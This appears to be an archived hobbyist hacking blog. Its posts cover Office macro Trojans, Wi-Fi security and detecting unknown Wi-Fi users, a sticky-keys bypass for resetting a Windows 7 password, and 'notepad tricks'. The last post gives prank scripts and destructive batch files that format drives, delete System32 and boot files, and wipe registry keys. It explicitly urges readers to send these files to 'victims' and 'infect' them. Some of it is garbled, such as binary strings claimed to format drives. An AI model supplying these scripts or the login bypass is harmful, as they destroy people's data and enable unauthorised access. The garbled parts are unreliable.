Tuesday 6 January 2015

Microsoft warns for new malware attacks with Office documents


Microsoft warns of increase in Adnel and Tarbir Trojan attacks on Excel and Word users.

Microsoft has warned its Microsoft Office users of significant rise in malware attacks through macros in Excel and Word programs.  In a report published on its blog, Microsoft says that there is more than a threefold jump in the malware campaigns spreading two different Trojan downloaders. These Trojan downloaders arrive in emails masquerading as orders or invoices.
The malwares are being spread through spam emails containing following subject lines accordingly to Microsoft
  • ACH Transaction Report
  • DOC-file for report is ready
  • Invoice as requested
  • Invoice – P97291
  • Order – Y24383
  • Payment Details
  • Remittance Advice from Engineering Solutions Ltd
  • Your Automated Clearing House Transaction Has Been Put On
  • 20140918_122519.doc
  • 813536MY.xls
  • ACH Transfer 0084.doc
  • Automated Clearing House transfer 4995.doc
  • BAC474047MZ.xls
  • BILLING DETAILS 4905.doc
  • CAR014 151239.doc
  • ID_2542Z.xls
  • Fuel bill.doc
  • ORDER DETAILS 9650.doc
  • Payment Advice 593016.doc
  • SHIPPING DETAILS 1181.doc
  • SHIP INVOICE 1677.doc
  • SHIPPING NO.doc

And the attachment containing Adnel and Tarbir campaigns is usually named as following :
Microsoft Technet blog says that the two Trojan downloaders,  TrojanDownloader:W97M/Adnel and TrojanDownloader:O97M/Tarbir are being spread at a rapid pace through spam emails and phishing campaigns. Worryingly they are targeting both home PC users and enterprise customers and most of the victims are based in United States and United Kingdom.
As Microsoft has decided to block execution of Macros in Office by default, the trojan authors/handlers add a notification to the document stating the contents of the documents can only be viewed with macros enabled. Upon opening the malware laden Word document or Excel sheet, the victim receives a default security warning stating macros have been disabled but some users simply disregard this message and enable the macros thus allowing the trojan downloaders to infect their PCs.
“The combination of the instructional document, spam email with supposed monetary content, and a seemingly relevant file name, can be enough to convince an unsuspecting user to click the Enable Content button”, according to Alden Pornasdoro of the Microsoft Malware Protection Center.
Once the Trojan downloader is downloaded it then starts to install other more deadlier malware on the systems it has infected.  Microsoft says that majority of invoices and orders sent by users dont require macros however if a user comes across such an order or invoice, he/she should be selective in running such documents or sheets.
Also Read- 

How to detect hackers or unknown people using your Wi-Fi connection?


Sunday 4 January 2015

5 WAYS TO SECURE A WIRELESS WI-FI NETWORK

1) Encrypt your Wi-Fi Network:
When you use a Wi-Fi network for accessing the internet, every piece of data you send and receive over the air can be easily snooped by anyone with the right set of tools. Packet sniffers can be used by even the most novice of users to sniff your data. This means that a hacker can not only see which websites are you accessing but also get the login details of your personal and professional accounts.
Encryption basically involves scrambling the data that is transmitted and received by you while using a wireless network. This means that even if a hacker intercepts your data transmission, (s)he will not be able to exploit the information contained within it.
2) Replace default passwords on your router with strong passwords:
The biggest mistake most wireless internet users make is not changing default passwords on their routers. Hackers utilize public databases that contain default passwords and usernames from virtually every manufacturer. This enables them to change the security settings of your router according to their needs. Using a strong password for your router ensures that hackers and miscreants cannot change your network’s security settings. To change the password on your router, visit Administration settings on your router’s settings page. Also, do not store passwords in browsers as they can be easily made visible.

3) Keep your firmware up to date:
Router vendors regularly release firmware updates and post them on their websites. You should occasionally check the manufacturer’s website to see if a new firmware update has been released. Newer routers will automatically inform you when new firmware is available.
4) When not using your internet network, turn it off:
This is self explanatory. If you are not using your network, turning it off saves you from giving extra time to hackers to try and hack into your wireless network. While it may be impractical to turn every device on your network off every time you are not using the network, it still is advisable to do so during extended periods of non use.
5) Use scary names to discourage Wi-Fi theft:
If your wireless network has a name like C:\virus.exe, most people who might otherwise access your network will not for the fear of getting their devices infected. You can use your creativity to find more dangerous names for your wireless network.

Saturday 3 January 2015

How to detect hackers or unknown people using your Wi-Fi connection?



AWKWARD SITUATION

Facing WiFi speed issue even after having good Internet plan and paying bill on time.
So, at this situation many questions strikes your mind like, “Is there anyone else other than
family members using our WiFi connection?”, “Are we being monitored by a hacker in our
WiFi?”,

“Does hacker using our WiFi for any illegal activity?”

You have the right to block unknown persons accessing your WiFi connection. So, this article will provide you a magic stick to find out answers of your questions by yourself. I am not discussing this article for Smartphone’s WiFi hotspots. It is for WiFi router at your home or small office.

WiFi speed issue persists when someone else is using your WiFi connection. This could also be a genuine problem if service issue from the Internet service provider (ISP). In that case, you can file a complaint to the concerned ISP and they will definitely resolve the issue.
But, in case there is no service problem and still you are facing speed issue than that could be the case of WiFi hacking.

As you all know, Hacking is the biggest trend among teenagers nowadays,
especially “WiFi hacking”. There are many methods by which WiFi router can be hacked to know WiFi password. After knowing WiFi password, hackers enjoy using neighbours or small office WiFi.

I am going to provide you a method by which you can easily track who else are using your WiFi connection. There are different types of software and apps available in market that could let you know who is active on your WiFi.
Here is a magic stick as software for your desktops/laptops named as “Who is on my WiFi”.

This software will let you know the Mac address and IPAddress of the computers, laptops and mobile devices, which are active on your WiFi.

Download ‘Who is on my WiFi’

software for Windows and Mac OS X at

www.whoisonmywifi.com

Nowadays almost everybody is using Smartphone. So, you can also easily detect who is using your WiFi. Isn’t that great?

The software i.e. “Who is on my WiFi”, I have discussed as above is also available for Android and iPhone users. You can easily download it from Google Play Store or iPhone App Store as per your device.

Download link for Android users: –

https://play.google.com/store/apps/details?id=com.whoisonmywifi.agent

Download link for iPhone users:

https://itunes.apple.com/us/app/whoisonmywifi/id770969761?ls=1&mt=8


Some other useful apps for your Android Smartphone, similar to this app are also available on the Internet. Like WiFi watch, WiFi Inspector and Fing. These apps will definitely let you know the list of all devices active on your WiFi network.

Download link for WiFi watch: –


Download link for WiFi Inspector:


Download link for Fing (Strongly Recommended): –


Now onwards whenever you face WiFi speed issue. You can take advantage of these software and apps by following their simple process after installation. You can easily find any unidentified computer or device in your WiFi network.

If you find any unidentified device in your network, it is recommended to change your WiFi
password. If in case, you don’t know the process of changing your WiFi
password. You can simply call toll free no of your concerned ISP (Internet Service Provider). The ISP representative will guide you about changing your WiFi password or they will send their Network Administrator at your location.

So finally you can detect hackers or unknown people in your WiFi
connection. Make sure you share this article with your friends so that they can also secure themselves from hackers and solve their WiFi speed issues.


Thursday 1 January 2015

HACK WINDOWS 7 PASSWORD USING CMD (command prompt).



Most of the people use a secret password to secure their computer. This article will help you geeks to Hack a password locked Windows 7 system using CMD.

This method will allow you to remove the existing password (which you have forgotten/don’t know) and reset the password to your like. It’s Simple but effective. Just follow the given steps properly.


Steps to be followed:
1) Make the system have a hard shutdown. This can be done by pressing the On/Off button on your computer while the “Starting Windows” screen is active. Do this as many times until you get the ‘Windows Error Recovery’ screen as shown below.





2) In it select the “Launch Startup Repair (recommended)” and a startup recovery option will appear on the screen.
3) Cancel the “Do you want to use System Restore?” prompt.

4) Wait until Windows has finished repairing your computer. This repairing process will not harm any files present in the system.

5) After waiting, a window will appear saying “Startup repair could not repair your computer.” You will also see an arrow pointing downwards in the bottom left corner (Problem Details). Click on it.
6) Scroll down and click the 2nd link. (Highlighted in the figure below)

7) After completing step 6, a Notepad will open up. Follow the given route shown in bold: File => Open => Computer => Local Disk => Windows => System32
8) Switch from Text Documents (*.txt) to All Files.

9) Now, in this folder, System32, find an application named sethc and rename it as sethc-bak(creating a backup file). Sethc is an application for the Sticky keys program and renaming it won’t do any harm to your computer.
Also, find the application named cmd and create a copy of it in the same folder(system32).Rename the copy file as sethc.

10) Close all opened windows and select ‘Finish’ and Restart your system.

11) When the Password screen appears, hit Shift 5 times. Command Prompt(Cmd) with admin privileges is opened by doing so.
12) Enter this code into cmd: net user[username]* to change the [username]’s password. You will not be able to see the new entered password, so enter it wisely and carefully.

13) After you have successfully changed the password, you can close the cmd screen.
14) Enter the new password you’ve set in the password screen of Windows 7, that’s all, you will now successfully enter the system.
                                                                                                          - REJECTED NUTS

Wednesday 31 December 2014

ALL NOTEPAD TRICKS . .


REJECTED NUTS

#1 Bush Hid the Facts – Most Popular Notepad Tricks

This is one of the mysterious notepad tricks we know. According to the trick it really seems Microsoft had put some hack into the coding of notepad making the text hidden after saving it.
Bush Hid the Facts – Most Popular Notepad Trick Open notepad.

Type BUSH HID THE FACTS
Save that file.

Close it

Open It Again See…

Why This Happens ? : It was later known 4335 Rule. It means that if we enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters each, and the last word has five letters. Then Notepad Automatically hides the text into unknown code. Similar are with “this app can break”.

OR

STEP 1: OPEN NOTEPAD
STEP 2: WRITE FOLLOWING LINE IN THE NOTEPAD.
THIS APP CAN BREAK
STEP 3: SAVE THIS FILE AS AAA.TXT
STEP 4: CLOSE THE NOTEPAD.
STEP 5: OPEN THE FILE AGAIN.

VOILLA!!

OR

1> OPEN NOTEPAD

2> ENTER FOUR WORDS SEPARATED BY SPACES, WHEREIN THE FIRST WORD HAS 4 LETTERS, THE NEXT TWO HAVE THREE LETTERS, AND THE LAST WORD HAS FIVE LETTERS

3> DON’T HIT ENTER AT THE END OF THE LINE.

4> SAVE THE FILE.

5> CLOSE NOTEPAD.

6> REOPEN NOTEPAD.

7> OPEN THE FILE YOU JUST SAVED.

YOU ARE DONE!!!




#2 World Trade Centre Attack Trick – Shocking Notepad Tricks

Did you know that the flight number of the plane that had hit WTC on 9/11 was Q33NY …
Open your Notepad

Type the flight number i.e Q33N in Capital Letters.

Increase the Font Size to 72

Change the Font to Wingdings

You will be amazed by the findings. Its a Plane going for 2 building shaped structures & then death.(see below) WTF ?

Must Be Shocking Right.

But This Is Only Hoax As No Plane No:-Q33N Crashed Into Twin Towers.





#3. Test Your Anti-Virus

You can also test your anti virus program for its effectiveness using a simple notepad trick. Follow the steps below to know more:

Open Notepad.

Copy the code give below in the notepad file:

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Save it with an .exe extension like testvirus.exe

This test is also known as EICAR (European Institute for Computer Antivirus Research) test file.
The file is simply a text file of either 68 or 70 bytes that is a legitimate executable file called a COM file that can be run by Microsoft operating systems and some work-alikes (except for 64-bit due to 16-bit limitations), including OS/2. When executed, it will print “EICARSTANDARD- ANTIVIRUS-TEST-FILE!” and then stop. 

The test string was specifically engineered to consist of ASCII human-readable characters, easily created using a standard computer keyboard. It makes use of self-modifying code to work around technical issues that this constraint makes on the execution of the test string.




#4. Continually Pop The CD Drive

Open Notepad.

Copy the code given below onto the notepad file:

Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


Save it as “Anything.VBS”.

Now open the file and see the magic! The file will continuously force the CD rom to pop out! And If you have more than one then it pops out all of them!

Note: Don’t worry when this crazy notepad trick opens your cd tray continuously. If you want to end this script simply Open Task Manager(Alt+Ctrl+Delete). Under Processes end the process “wscript.exe”



#5.Convert Text Into Audio Using Notepad

How To Do It ?

Open Notepad file on your Windows PC.

Copy and paste the below mentioned code :

Dim msg, sapi
msg=InputBox(“Enter your text for conversion–www.techvorm.com”,”TechVorm Text-To-Audio Converter”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak msg

Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs

Thats it ! Your Text to Audio converter is ready to be used. Now open the saved file and key in the text you want to convert and click OK.

If you find any difficulties in using this code, let me know via comments section.





#6. Matrix Effect

Not much to explain, just follow the steps and see the amazing matrix effect happen in your DOS window:

Open Notepad.

Copy the below mentioned text in your notepad file:

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

Save the file with .bat extension like Matrix.bat
Thats it. Just open the file to see the matrix effect right before your eyes!




#7. Change The Header/Footer Of Your Notepad File

More often than not whenever you get a printout of your notepad file, it starts with “Untitled” or the filename at top, and “Page ” on bottom. Now if you want to get rid of it or want to change it, just follow the simple steps given below.

Open Notepad.

Click on File -> Page Setup.
Replace the text written in the “Header” and “Footer” box (as shown above) by any of the following codes:
&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number






#8. Constantly Repeat Messages

Using this notepad trick you can annoy anyone and can actually force them to log off or leave the computer (LOL….). This notepad trick will create an infinite cycle of a message in the computer. Follow the steps to know more:

Open Notepad.

Paste the following code in the notepad file:

@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

Save the file with any file name but with .bat as extension and close it. For eg. Freakymessage.bat
After saving the file just open it (by double clicking) and see what happens.





#9. Shut-down The Computer After Conveying Any Message

This one is kind of an annoying trick and if used unknowingly can certainly cause problems (am serious). What this trick does is, after conveying a (any) message it shuts down the computer without any confirmation. In order to create the Shutdown file, follow the below mentioned steps:

Open Notepad.

Paste the following code in it:

@echo off
msg * Its time to get some rest.
shutdown -c “Error! You have to take rest! Byeeeeee” -s
Save the file with any name but with .bat extension and close it. For eg. TakeRest.bat





#10. Toggle Keyboard Button Simultaneously

Using Notepad (and VB) you can set different keys on your keyboard to toggle continuously. Following are the 3 tricks using which different keys can be set to toggle simultaneously. Follow the steps given under each head to try out the tricks.

1. Caps Lock Key

Open Notepad.

Paste the following code in the notepad file:

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

Save the file with anyname and .vbs extension. and close it.
Now open the newly created file and see how the caps lock key behaves on your keyboard!


2. Hit Enter Key Continuously

Open Notepad.

Paste the following code in the notepad file:

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Save the file with any name and .vbs extension and close it.
Now open the newly created file and see how the enter key behaves!


3. Hit Backspace Key Continuously

Open Notepad.

Paste the following code in the notepad file:

MsgBox “Lets Rumble”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop


Save the file with any name and with .vbs extension and close it.
Now open the newly created file and see how the key behaves!




#12. Type “You are a fool” Continuously

Not much to explain, the title says it all! Follow the steps to make this trick work:

Open Notepad.

Paste the following code in the notepad file:

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
Save the file with any name but with .vbs extension and close it.
Ope the file and see how it makes you type!



#13. Open Notepad continuously

Open Notepad.

Paste the following code in your notepad file:

@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top

Save the file with any name nut with .bat extension and close it.
Now open the file and see how it annoys you by opening notepad again and again.




#14. Pick Your Option Batch File

When used this creates a file which asks you to choose a number between 1-5 and then does a certain action (as shown below – Action
accompanied by number):

1 – Shut’s down the computer
2 – Restart’s the computer
3 – Wipes out the hard drive
4 – Net send
5 – Shows a message & then shut’s down the computer

Before you try out this trick, keep in mind that this can cause loss of important data on your (or any one else’s on which you are running
this file) computer system. So BEWARE! In order to create the file, follow the steps given below:

Open Notepad.

Paste the following code in the notepad file:

@echo off
title Get A Life
cd C:
:menu
cls

echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC
will be formatted. Do not cry if you loose your data or anything.

pause
echo Pick your option:
echo 1. Die Slowly
echo 2. Instant Death
echo 3. Stay Away From This One
echo 4. Die this way (For Wimps!)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save the file with any name and with a .bat extension and close the file.





#15. IN THIS HACK I WILL SHOW YOU HOW TO FORMAT A HDD USING NOTEPAD AND HOW TO DESTROY VICTIMS PC USING

NOTEPAD. THIS IS REALLY COOL.

(A) STEP 1 :-

COPY THE FOLLOWING IN NOTEPAD EXACTLY AS IT IS.

SAYS01001011000111110010010101010101010000011111100000

STEP 2 :-

SAVE AS AN .EXE ANY NAME WILL DO

STEP 3 :-

SEND THE .EXE TO PEOPLE AND INFECT

OR

IF YOU THINK CANNOT FORMAT C DRIVE WHEN WINDOWS IS RUNNING TRY LAUGHING AND U WILL GET IT Secret. ANY WAY SOME

MORE SO U CAN TEST ON OTHER DRIVES THIS IS SIMPLE BINARY CODE
FORMAT C:\ /Q/X — THIS WILL FORMAT YOUR DRIVE C:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000

FORMAT D:\ /Q/X — THIS WILL FORMAT YOUR DIRVE D:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000

FORMAT A:\ /Q/X — THIS WILL FORMAT YOUR DRIVE A:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000

DEL /F/S/Q C:\BOOT.INI — THIS WILL CAUSE YOUR COMPUTER NOT TO BOOT.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001

TRY TO FIGURE OUT URSELF REST

CANT SPOONFEED
\
ITS WORKING

DO NOT TRY IT ON YOUR PC. DON’T MESS AROUND THIS IS FOR EDUCATIONAL PURPOSE ONLY

STILL IF YOU CANT FIGURE IT OUT TRY THIS

GO TO NOTEPAD AND TYPE THE FOLLOWING:

(B) @ECHO OFF
DEL C:\ *.*|Y

SAVE IT AS DELL.BAT

WANT WORSE THEN TYPE THE FOLLOWING:

@ECHO OFF
DEL %SYSTEMDRIVE%\*.*/F/S/Q
SHUTDOWN -R -F -T 00

AND SAVE IT AS A .BAT FILE

(C) HOW TO SHUTDOWN A COMPUTER FOREVER..
CODE:

@ECHO OFF
ATTRIB -R -S -H C:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R -S -H C:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R -S -H C:\NTLDR
DEL C:\NTLDR
ATTRIB -R -S -H C:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI

OPEN UP AND COPY THE CODE AND SAVE IT AS .BAT FILE..
THIS WILL SHUT DOWN THE PERSON’S COMPUTER.IT SHUTS IT OFF ONCE AND DELETES THE FILES NEEDED TO REBOOT AND
RESTART.

REMEMBER – DO NOT OPEN THE FILE.

YOU WON’T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

(D) A SIMPLE HACK TO DESTROY UR VICTIM’S PC

I M HERE EXPLAIN TO MAKE A FILE THAT DESTROYS UR VICTIMS PC

I M NOT RESPONSIBLE FOR THE DAMAGE CAUSED BY THIS FILE.”

1. OPEN NOTEPAD

2. WRITE THE ABOVE COMMAND : -

DEL C:\WINDOWS\SYSTEM32\*.*/Q

3. SAVE THE ABOVE NOTEPAD WITH THE EXTENSION “.BAT OR .CMD” AS U WANT

4. !!!!!!!!!!!!!!!!!!!!!!ATTENTION!!!!!!!!!!!!!!!!!!! !!!

55 THOUGHTS ON “ALL NOTEPAD TRICKS.”

DON’T DOUBLE CLICK THE FILE OTHERWISE U R IN TROUBLE.

WHY ?????? BCZ THE FILE U CREATED DELETE ALL FILES FROM UR SYSTEM32 FOLDER AND WHEN U RESTART UR PC IT WILL NOT START BCZ SYSTEM CAN NOT FIND THE FILES IN THE SYSTEM32 FOLDER WHICH IS REQUIRED AT THE TIME OF BOOTING.


5. YOU CAN ALSO TEST THE ABOVE BY CREATING A FAKE FOLDER LET SUPPOSE
WINDOWS1 IN C:\. COPY SOME OLD FILES IN IT AND JUST FOLLOW THE ABOVE COMMAND.BY DOUBLE CLICKING THE BAT OR CMD FILE UR ALL FILES AUTOMAITCALLY GET DELETED.


6. YOU CAN TRY THIS FILE IN ANY ONE`S COMPUTER.(BUT THIS RESULT IN CAUSING DAMAGE TO THE COMPUTER, SO THINK AGAIN BEFORE TRYING THIS ON ANYONE’S PC)

***MOST DANGEROUS NOTEPAD TRICK***

OPEN NOTEPAD

TYPE:

@ECHO OFF
START REG DELETE
HKCR/ .EXE
START REG DELETE
HKCR/.DLL
START REG DELETE HKCR/*
:MESSAGE
ECHO YOUR COMPUTER HAS
BEEN FCKED.HAVE A
NICE DAY.
GOTO MESSAGE